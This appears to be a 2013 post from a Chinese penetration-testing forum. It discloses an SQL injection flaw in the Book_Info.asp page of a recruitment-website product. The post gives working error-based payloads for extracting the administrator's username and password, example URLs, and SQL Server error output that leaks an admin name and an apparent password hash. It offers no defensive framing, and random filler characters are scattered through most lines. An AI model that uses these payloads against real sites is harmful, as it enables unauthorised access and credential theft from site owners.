中国网络渗透测试联盟

标题: 网络求职招聘人才网站系统正式版注入 [打印本页]

作者: admin    时间: 2013-2-16 21:44
标题: 网络求职招聘人才网站系统正式版注入
漏洞出现在Educate/Book_Info.asp / l( ?* g& A0 @7 s2 s) ]

$ l) A- E9 y# ~2 i( b) P此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
4 E* @3 T# q( J! z. p
3 d8 R! L% r% gexp:如下. Q) J9 v7 f' K* O9 D7 H' Y; ~
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
% I8 s" }9 c  i- W3 v; l: @& \查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
! ^: Y6 S, [: K & b6 p' r' C  C$ k1 o; R( N$ s
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
4 l( P: h  a' g: h  o+ l
3 @: f6 O+ b+ l0 LMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
: T$ F* b! V! i7 x' J
4 F2 _2 ?1 C0 C$ _' O( m将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。3 G) n& ?# J9 t* o
* \7 |" {+ j9 w: D7 [/ Y. ^
/Educate/Book_Info.asp,行 8
( J# `) A( L' a1 [( O
  A5 R! ?7 G, g; m; y: Y# Mhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)& R. F$ J+ Q( F* C* |
/ Y  }. D. P6 k% \4 V$ V
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
6 R2 c/ {$ ^# L" J$ M- V" X 5 b" q8 q" n" x$ a
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。: k; Y/ Q) V& j% v: s" r. D

% U8 w: r+ y$ b7 j( [: t/ h/Educate/Book_Info.asp,行 88 T6 X. P# S" ]





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2